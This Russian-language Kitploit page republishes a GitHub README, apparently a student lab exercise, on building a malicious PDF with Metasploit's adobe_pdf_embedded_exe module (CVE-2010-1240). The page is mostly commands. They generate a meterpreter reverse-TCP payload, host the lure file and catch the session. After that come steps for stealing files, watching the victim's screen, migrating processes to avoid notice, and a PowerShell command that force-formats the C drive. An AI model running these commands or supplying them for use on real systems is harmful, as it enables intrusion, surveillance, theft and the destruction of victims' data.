Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/jasmoon99/embedded-pdf
Инструменты фишингаГенерация полезной нагрузкиЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеСоциальная инженерияОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubjasmoon99/embedded-pdf

Embedded-PDF

Это демонстрационное видео показывает, как можно управлять устройством жертвы, отправив невинно выглядящий PDF-файл цели, который на самом деле содержит встроенную полезную нагрузку. Эксплойт был опубликован как CVE-2010-1240.

7165 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

Внедрение бэкдора через PDF-файлы 😈

предоставлено    

Введение

В этом демонстрационном видео показано, как мы можем управлять устройством жертвы, отправив ей безобидный на вид PDF-файл, который на самом деле содержит встроенную полезную нагрузку. Эксплойт был опубликован как CVE-2010-1240.

Как только PDF открывается в Adobe Reader, пользователи, которых мы обманом заставляем согласиться на всплывающие окна безопасности, позволят нам получить сеанс meterpreter, подключенный к их устройствам через обратное TCP-соединение. До этого момента все их данные и то, что они делают сейчас, находятся под нашим наблюдением.

Hehe~Boi

Список программ/инструментов

  • Metasploit
  • Adobe Reader <= 8.1.2

Окружение

Kali Linux         Windows 7 or 10         Adobe Reader        

  • Машина атакующего: Kali Linux версии 2021.1
  • Целевая ОС: Windows 10 (x86) или Windows 7 (x86)
  • Целевое ПО: Adobe Reader 8.1.2

Подробные шаги

Сначала запускаем MSFconsole, которая предоставляет интерфейс командной строки для доступа к фреймворку Metasploit.

root@kitploit:~
msfconsole

Затем ищем эксплойт, соответствующий нашей целевой платформе Windows и Adobe PDF Reader, который покажет весь список эксплойтов, которые можно использовать для взлома Windows-машины жертвы и эксплуатации уязвимостей Adobe PDF Reader.

root@kitploit:~
search type:exploit platform:windows adobe pdf

В этой эксплуатации мы выбираем и используем модуль "adobe_pdf_embedded_exe" с помощью команды ниже, чтобы добиться цели взлома жертвы.

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

Также мы можем проверить информацию об эксплойте с помощью команды "info", как показано ниже:

root@kitploit:~
info

Затем устанавливаем полезную нагрузку для использования обратного TCP-соединения. Также используем Meterpreter, который предоставляет интерактивную оболочку, позволяющую нам легко использовать всевозможные функции путем вставки и выполнения кода для изучения машины жертвы.

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

Затем настраиваем хост и порт для прослушивания. Для LHOST нужно указать IP-адрес машины атакующего, в данном случае IP-адрес нашей Kali-машины (10.0.2.4)*.

  • *примечание*
    • Вам нужно использовать IP-адрес вашей собственной Kali-машины
    • Вы можете использовать другой номер порта

Что касается LPORT, то мы сами выбираем номер порта, который не является часто используемым.

root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

Затем задаем входной файл для основы PDF с флагом INFILENAME*. Далее устанавливаем имя файла, которое привлечет интерес жертвы, чтобы она открыла вредоносный PDF-файл.

  • *примечание*
    • Убедитесь, что путь к вашему PDF-файлу указан верно
    • Вы можете использовать другое имя файла
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

Мы можем снова просмотреть наши опции перед вводом команды "exploit" для генерации полезной нагрузки вместе с PDF.

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

После того как мы сгенерировали PDF-файл, перемещаем его в /var/www/html — каталог нашей Kali-машины для размещения веб-сервера, чтобы жертва могла позже скачать PDF-файл.

  • Примечание:
    • Если вы задали другое имя файла, обязательно скопируйте правильный путь!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

Затем для настройки нашего слушателя используем "exploit/multi/handler". Снова задаем полезную нагрузку, LHOST, LPORT в соответствии с тем, что мы определили при генерации вредоносного PDF-файла. Затем запускаем полезную нагрузку.

  • Примечание:
    • LHOST: обратите внимание на IP-адрес вашей собственной Kali-машины
    • LPORT: если вы задали другой номер порта, убедитесь, что ввели его правильно
    • show info или show options — необязательная команда для выполнения.
      • Она нужна только для проверки того, что вы только что настроили.
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

В другом терминале проверяем статус сервера Apache, чтобы убедиться, что он запущен для размещения нашего PDF-файла в /var/www/html, чтобы жертва могла его скачать.

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

На машине с Windows откройте любой браузер, например Chrome, и введите IP-адрес нашей Kali (10.0.2.4)* для доступа к веб-серверу Kali-машины.

*Примечание: Обратите внимание на IP-адрес вашей собственной Kali-машины

Затем имитируйте сохранение предполагаемого PDF-файла пользователем.

Как только жертва откроет файл в Adobe Reader 8.1.2, приняв всплывающие сообщения безопасности, мы увидим на нашей Kali-машине, что появилась новая сессия, подключенная через обратное TCP-соединение.

В реальном сценарии мы создадим веб-сайт с PDF-файлом, содержащим полезную нагрузку, чтобы жертва могла скачать его или прикрепить по электронной почте.


Результат эксплуатации

Затем мы можем удаленно получить доступ к машине жертвы и выполнять дальнейшие вредоносные действия по нашему желанию в сеансе meterpreter.

Чтобы показать список того, что мы можем сделать

root@kitploit:~
help

Показать текущую директорию

root@kitploit:~
pwd

Список файлов в этой директории

root@kitploit:~
ls

Скачать папку или файл с машины жертвы

Например, есть файл с именем password.txt, мы можем выполнить команду download password.txt

root@kitploit:~
download [folder name | filename with extension]

Создать файл на машине жертвы

Конечно, мы можем написать вредоносный скрипт (внедрить бэкдор), чтобы сохранить подключение к Windows-машине, если мы действительно злые! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

Взаимодействие с Windows

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

Дополнительно

Однако атакующий может уменьшить подозрения путем миграции процесса meterpreter в другой с помощью модуля migrate в сеансе meterpreter.

root@kitploit:~
meterpreter> run post/windows/manage/migrate

Здесь он автоматически запустит новый процесс на машине жертвы, в который мигрирует. Жертва затем сможет удалить зараженный PDF-файл, совершенно не подозревая, что процесс уже переместился в другое место.

Атакующий может дальше создать вредоносный скрипт на целевой машине с помощью командной строки (cmd) или PowerShell, который может вывести из строя всю операционную систему.

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

Демонстрационное видео

Demo

Скачать инструмент